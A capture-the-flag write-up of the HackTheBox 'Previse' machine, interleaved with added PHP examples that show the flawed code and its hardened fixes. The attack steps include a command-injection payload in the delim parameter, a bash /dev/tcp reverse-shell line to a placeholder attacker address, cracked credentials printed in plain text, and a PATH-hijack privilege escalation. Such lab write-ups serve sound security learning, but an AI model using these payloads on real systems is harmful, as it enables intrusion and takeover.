HackTheBox — Previse

We start with nmap to discover open ports and services.

Nmap Scan

nmap -sC -sV -oA previse

Starting Nmap 7.80 ( https://nmap.org ) at 2021-08-13 12:08 EET
Nmap scan report for
Host is up (0.21s latency).
Not shown: 998 closed ports
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
| 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have two open ports, SSH on 22 and HTTP on 80, and there are no serious known vulnerabilities for these service versions.

So let's enumerate the HTTP port.

Enumerating HTTP

Going to redirects us to

The page ends with .php, so we know it's a PHP app; when we run a directory brute-forcer we need to specify the .php extension.

I tried logging in with admin:admin and admin:password, and tried a simple login bypass (test' or 1=1 -- -), but nothing worked.

So I launched gobuster with raft-medium-words.txt from SecLists: gobuster dir -u -w raft-medium-words.txt -t 100 -x php -b 404,403

When I try to access any of these files it redirects me to login.php. BUT when I intercept the request before the redirect, the response says 302 Found but I can see the content of the page.

Let's visit /accounts.php

As you can see, we can create a new user by submitting the same data the form sends, so to create a new user we need to send a POST request to /accounts.php with the POST parameters username, password and confirm.
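Why the intercepted 302 still carried the whole page: PHP's header() only queues a response header and does not stop the script, so everything after it (the form and the POST handler) still runs and is sent as the body of the redirect. The following is an added example, not code from this post or from the Previse application; the session key 'user' and the page markup are assumptions. It shows the redirect-without-exit pattern next to a guard that actually stops execution.

```php
<?php
// Added example, not the box's own code. Session key 'user' is an assumption.
session_start();

// VULNERABLE: header() only queues a "Location:" header; PHP keeps running.
// Everything below is still executed and sent as the body of the 302, so a
// client that does not follow the redirect sees the form and can POST to it.
function accounts_page_vulnerable(): void
{
    if (!isset($_SESSION['user'])) {
        header('Location: login.php');
        // missing exit; execution falls through
    }
    handle_account_form();
}

// HARDENED: redirect and stop. Called first on every protected page and on
// every POST handler, so no code after it runs for an unauthenticated request.
function require_login(): void
{
    if (!isset($_SESSION['user'])) {
        header('Location: login.php', true, 302);
        exit;
    }
}

function accounts_page_hardened(): void
{
    require_login();
    handle_account_form();
}

// Shared page body: validates the three fields the form submits.
function handle_account_form(): void
{
    if ($_SERVER['REQUEST_METHOD'] === 'POST') {
        $user    = trim($_POST['username'] ?? '');
        $pass    = $_POST['password'] ?? '';
        $confirm = $_POST['confirm'] ?? '';
        if ($user === '' || $pass === '' || $pass !== $confirm) {
            echo '<p>Username, password and confirmation are required and must match.</p>';
        } else {
            // persist the account here (database code omitted; not the point of the example)
            echo '<p>Created user ' . htmlspecialchars($user, ENT_QUOTES, 'UTF-8') . '</p>';
        }
    }
    echo '<form method="post">'
       . '<input name="username" placeholder="username">'
       . '<input name="password" type="password">'
       . '<input name="confirm" type="password">'
       . '<button type="submit">Create user</button></form>';
}

accounts_page_hardened();
```

To verify the fix, request the page without a session cookie and without following redirects: the 302 response body should now be empty. The same guard belongs in every script that performs an action, since forced browsing targets the handlers, not just the HTML.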

Now we have a new user embo1:embo1, let's log in with it.

And we are logged in. There is a SITEBACKUP.ZIP file and a user newguy on the FILES page; let's download it.

As the file name says, it's a backup of the web site.

The config.php file contains mysql credentials.


In logs.php, the POST parameter delim is passed straight into the exec function without any validation.

So we can intercept the request and inject something like delim=space;whoami, but the output is not reflected in the response. Let's instead try pinging our machine, delim=space;ping -c1 <Our IP> (don't forget to URL-encode it), and run tcpdump to capture it: sudo tcpdump -n -i tun0 icmp

And we received an ICMP echo request, so we have command execution. Let's get a shell on the box.
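The defect behind this, as an added example that is not code from this post or from the Previse application: the exec() call receives the POST value as a shell fragment, so the space;whoami payload above becomes a second command. The hardened version treats delim as an identifier that is looked up in an allowlist and then quoted. The export command path and the delimiter names other than "space" are assumptions.

```php
<?php
// Added example, not the box's own code. LOG_EXPORT_CMD is a hypothetical
// placeholder for whatever logs.php actually runs.
const LOG_EXPORT_CMD = '/usr/local/bin/HYPOTHETICAL-log-export';

// Allowlist: the only values delim may take, and the character each maps to.
const DELIMITERS = ['comma' => ',', 'space' => ' ', 'tab' => "\t"];

// VULNERABLE: the raw POST value is interpolated into the command line, so
// shell metacharacters in it (; | & ` $()) are interpreted by /bin/sh.
function build_command_vulnerable(string $delim): string
{
    return LOG_EXPORT_CMD . ' ' . $delim;
}

// HARDENED step 1: validate against the allowlist; anything else is rejected.
function validate_delim(string $delim): ?string
{
    return DELIMITERS[$delim] ?? null;
}

// HARDENED step 2: even the mapped character goes through escapeshellarg(),
// so the shell receives exactly one quoted argument.
function build_command_hardened(string $delim): ?string
{
    $char = validate_delim($delim);
    if ($char === null) {
        return null;
    }
    return LOG_EXPORT_CMD . ' ' . escapeshellarg($char);
}

// Request handler: 400 on invalid input, and the rejection is logged so that
// probes such as "space;whoami" leave a trace in the application log.
function export_logs(string $delim): string
{
    $cmd = build_command_hardened($delim);
    if ($cmd === null) {
        http_response_code(400);
        error_log('logs.php: rejected delim value ' . json_encode($delim));
        return 'unsupported delimiter';
    }
    exec($cmd, $output, $status);
    return $status === 0 ? implode("\n", $output) : 'export failed';
}

if (PHP_SAPI === 'cli') {
    // Show the command line each version would build for the payload from the writeup.
    $payload = 'space;whoami';
    echo "vulnerable: " . build_command_vulnerable($payload) . "\n";
    echo "hardened:   " . (build_command_hardened($payload) ?? '(rejected)') . "\n";
    echo "hardened:   " . build_command_hardened('space') . "\n";
}
```

The ICMP callback used above to confirm execution is also the detection opportunity: a web server has little reason to originate ICMP or outbound connections to arbitrary addresses, so egress filtering and alerting on such traffic from the web tier catches this class of injection even when the command output is never reflected in a response.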

Initial Foothold

Let's replace the ping command with a reverse shell and run a netcat listener: delim=space;bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'

We received a connection and we are on the box as www-data.

Getting User

After some enumeration I couldn't find anything, but remember the MySQL credentials we got earlier? Let's log in to MySQL using root:mySQL_p@ssw0rd!:)

I found an accounts table inside the previse database that contains an md5crypt hash for m4lwhere.

Let's save the hash to a file and crack it with hashcat or john: hashcat -m 500 hash.txt rockyou.txt OR john hash.txt --wordlist=/opt/rockyou.txt --format=md5crypt. I use hashcat on my Windows host because it's much faster than john.
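The hash falls to a wordlist quickly because md5crypt ($1$ prefix, hashcat mode 500) is a fast legacy scheme. The following is an added example, not code from this post or from the Previse application, showing how an application can keep verifying such legacy hashes with crypt() while transparently replacing them with password_hash() on the next successful login. The account store is a constructed in-memory array and the demo password, salt and username are made up; nothing here is the box's own hash.

```php
<?php
// Added example, not the box's own code. The account store is a constructed
// in-memory array; a real application would read and update its database.

// Legacy scheme the box used: md5crypt, recognisable by the "$1$" prefix.
function is_legacy_md5crypt(string $hash): bool
{
    return strncmp($hash, '$1$', 3) === 0;
}

// Build an md5crypt hash the way the old application would have. This is only
// here to construct demo data; never create new hashes like this.
function legacy_md5crypt(string $password, string $salt): string
{
    return crypt($password, '$1$' . $salt . '$');
}

// Verify a candidate password against whatever hash is stored, then upgrade
// legacy hashes in place after a successful login.
function login(array &$accounts, string $username, string $password): bool
{
    if (!isset($accounts[$username])) {
        return false;
    }
    $stored  = $accounts[$username];
    $options = ['cost' => 12];

    if (is_legacy_md5crypt($stored)) {
        // crypt() with the stored hash as the salt reproduces it iff the password matches.
        if (!hash_equals($stored, crypt($password, $stored))) {
            return false;
        }
        // The plaintext is available at this moment: replace the legacy hash with bcrypt.
        $accounts[$username] = password_hash($password, PASSWORD_BCRYPT, $options);
        return true;
    }

    if (!password_verify($password, $stored)) {
        return false;
    }
    // Also bump hashes that were created with weaker parameters.
    if (password_needs_rehash($stored, PASSWORD_BCRYPT, $options)) {
        $accounts[$username] = password_hash($password, PASSWORD_BCRYPT, $options);
    }
    return true;
}

// Constructed demo data (not the box's account, hash or password).
$accounts = ['alice' => legacy_md5crypt('correct horse', 'abcdefgh')];

echo 'wrong password accepted: ', login($accounts, 'alice', 'wrong') ? 'yes' : 'no', "\n";
echo 'right password accepted: ', login($accounts, 'alice', 'correct horse') ? 'yes' : 'no', "\n";
echo 'still md5crypt after login: ', is_legacy_md5crypt($accounts['alice']) ? 'yes' : 'no', "\n";
echo 'right password accepted again: ', login($accounts, 'alice', 'correct horse') ? 'yes' : 'no', "\n";
```

Run it with php on the command line; after the first successful login the stored value starts with $2y$ instead of $1$, and from then on password_verify() handles it.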


Now we have m4lwhere:ilovecody112235!, let's SSH into the machine (or just use su m4lwhere -).

Getting Root

Running sudo -l shows that we can run /opt/scripts/access_backup.sh as root.

Looking at the script, it runs gzip without specifying the full path, which means we can modify the $PATH variable so that the search for gzip hits another directory first, one where we have placed our own gzip script.

Let's create our gzip script in the /dev/shm/ directory and make it executable: chmod +x gzip

Now we modify the $PATH variable so that it starts with the directory containing our script.

Run a netcat listener, nc -nvlp 1337, and run the script: sudo /opt/scripts/access_backup.sh

And we are ROOT!

Written by 0xEmbo

I am a penetration testing enthusiast with a computer science background, also interested in CTFs and Python scripting.

